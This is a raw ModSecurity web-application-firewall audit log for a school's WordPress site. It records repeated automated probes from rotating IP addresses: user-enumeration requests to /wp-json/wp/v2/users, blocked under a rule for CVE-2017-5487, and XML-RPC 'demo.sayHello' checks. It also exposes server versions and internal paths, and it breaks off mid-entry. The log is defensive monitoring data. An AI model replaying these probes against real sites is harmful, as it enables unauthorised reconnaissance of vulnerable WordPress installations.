Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ed4d297b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed4d297b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746663894479394 3645 (- - -) Stopwatch2: 1746663894479394 3645; combined=1520, p1=472, p2=1017, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed4d297b-Z-- --3817377a-A-- [08/May/2025:07:25:02 +0700] aBv53sP9GxxPAbCroFbMigAAAFg 103.236.140.4 41854 103.236.140.4 8181 --3817377a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3817377a-C-- demo.sayHello --3817377a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3817377a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746663902040039 5796 (- - -) Stopwatch2: 1746663902040039 5796; combined=4055, p1=566, p2=3244, p3=37, p4=36, p5=102, sr=64, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3817377a-Z-- --f2864b3c-A-- [08/May/2025:07:29:27 +0700] aBv658P9GxxPAbCroFbMjgAAAEE 103.236.140.4 41912 103.236.140.4 8181 --f2864b3c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f2864b3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2864b3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664167725011 3245 (- - -) Stopwatch2: 1746664167725011 3245; combined=1440, p1=496, p2=911, p3=0, p4=0, p5=32, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2864b3c-Z-- --4a0f2368-A-- [08/May/2025:07:29:34 +0700] aBv67o4K347NtBcwXKwFUwAAAIE 103.236.140.4 41916 103.236.140.4 8181 --4a0f2368-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.226 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4a0f2368-C-- demo.sayHello --4a0f2368-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a0f2368-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664174710591 5258 (- - -) Stopwatch2: 1746664174710591 5258; combined=3722, p1=490, p2=3041, p3=32, p4=35, p5=75, sr=58, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a0f2368-Z-- --b1c66c35-A-- [08/May/2025:07:30:48 +0700] aBv7OI4K347NtBcwXKwFVAAAAIc 103.236.140.4 41926 103.236.140.4 8181 --b1c66c35-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b1c66c35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1c66c35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664248498144 3553 (- - -) Stopwatch2: 1746664248498144 3553; combined=1457, p1=482, p2=943, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1c66c35-Z-- --f447d973-A-- [08/May/2025:07:30:55 +0700] aBv7Pys5rYyn3jlLjjK-tgAAAMg 103.236.140.4 41930 103.236.140.4 8181 --f447d973-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f447d973-C-- demo.sayHello --f447d973-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f447d973-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664255293693 5322 (- - -) Stopwatch2: 1746664255293693 5322; combined=4045, p1=521, p2=3307, p3=30, p4=32, p5=92, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f447d973-Z-- --1e5e3f23-A-- [08/May/2025:07:31:56 +0700] aBv7fI4K347NtBcwXKwFVgAAAII 103.236.140.4 41940 103.236.140.4 8181 --1e5e3f23-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1e5e3f23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e5e3f23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664316556311 3059 (- - -) Stopwatch2: 1746664316556311 3059; combined=1298, p1=434, p2=827, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e5e3f23-Z-- --57111f38-A-- [08/May/2025:07:32:03 +0700] aBv7g6cs1DvJ_HgMHE_xgAAAABM 103.236.140.4 41944 103.236.140.4 8181 --57111f38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.214 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --57111f38-C-- demo.sayHello --57111f38-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --57111f38-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664323478509 6943 (- - -) Stopwatch2: 1746664323478509 6943; combined=4994, p1=735, p2=4008, p3=38, p4=43, p5=101, sr=137, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57111f38-Z-- --eee5c356-A-- [08/May/2025:07:32:19 +0700] aBv7kys5rYyn3jlLjjK-uwAAAM8 103.236.140.4 41950 103.236.140.4 8181 --eee5c356-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eee5c356-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eee5c356-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664339675615 3242 (- - -) Stopwatch2: 1746664339675615 3242; combined=1432, p1=487, p2=912, p3=0, p4=0, p5=32, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eee5c356-Z-- --a0cb652e-A-- [08/May/2025:07:32:27 +0700] aBv7m44K347NtBcwXKwFWAAAAIg 103.236.140.4 41954 103.236.140.4 8181 --a0cb652e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.119 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a0cb652e-C-- demo.sayHello --a0cb652e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0cb652e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664347785146 5189 (- - -) Stopwatch2: 1746664347785146 5189; combined=3913, p1=499, p2=3206, p3=26, p4=27, p5=91, sr=69, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0cb652e-Z-- --6c2aba12-A-- [08/May/2025:07:33:42 +0700] aBv75o4K347NtBcwXKwFWgAAAIk 103.236.140.4 41962 103.236.140.4 8181 --6c2aba12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.3 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6c2aba12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c2aba12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664422435361 2437 (- - -) Stopwatch2: 1746664422435361 2437; combined=1101, p1=341, p2=734, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c2aba12-Z-- --196f5761-A-- [08/May/2025:07:33:44 +0700] aBv76I4K347NtBcwXKwFWwAAAI0 103.236.140.4 41964 103.236.140.4 8181 --196f5761-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.95 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.95 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --196f5761-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --196f5761-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664424457664 2284 (- - -) Stopwatch2: 1746664424457664 2284; combined=1069, p1=321, p2=722, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --196f5761-Z-- --280ada29-A-- [08/May/2025:07:33:48 +0700] aBv77Cs5rYyn3jlLjjK-vwAAANY 103.236.140.4 41970 103.236.140.4 8181 --280ada29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.95 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.95 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --280ada29-C-- demo.sayHello --280ada29-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --280ada29-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664428946601 5634 (- - -) Stopwatch2: 1746664428946601 5634; combined=4129, p1=579, p2=3328, p3=32, p4=36, p5=92, sr=79, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --280ada29-Z-- --c55cdb4d-A-- [08/May/2025:07:33:50 +0700] aBv77is5rYyn3jlLjjK-wAAAANQ 103.236.140.4 41972 103.236.140.4 8181 --c55cdb4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.3 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c55cdb4d-C-- demo.sayHello --c55cdb4d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c55cdb4d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664430783894 5372 (- - -) Stopwatch2: 1746664430783894 5372; combined=4025, p1=527, p2=3283, p3=29, p4=33, p5=91, sr=79, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c55cdb4d-Z-- --f1937661-A-- [08/May/2025:07:34:43 +0700] aBv8Iys5rYyn3jlLjjK-xAAAAME 103.236.140.4 41980 103.236.140.4 8181 --f1937661-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f1937661-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1937661-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664483089761 3226 (- - -) Stopwatch2: 1746664483089761 3226; combined=1426, p1=498, p2=896, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1937661-Z-- --1dc50724-A-- [08/May/2025:07:34:44 +0700] aBv8JI4K347NtBcwXKwFXAAAAJQ 103.236.140.4 41982 103.236.140.4 8181 --1dc50724-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1dc50724-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dc50724-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664484476631 1985 (- - -) Stopwatch2: 1746664484476631 1985; combined=947, p1=331, p2=590, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dc50724-Z-- --e86cb921-A-- [08/May/2025:07:34:45 +0700] aBv8JSs5rYyn3jlLjjK-xQAAANM 103.236.140.4 41984 103.236.140.4 8181 --e86cb921-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e86cb921-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e86cb921-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664485940368 1930 (- - -) Stopwatch2: 1746664485940368 1930; combined=976, p1=308, p2=642, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e86cb921-Z-- --cdd0291a-A-- [08/May/2025:07:34:48 +0700] aBv8KKcs1DvJ_HgMHE_xggAAAA8 103.236.140.4 41992 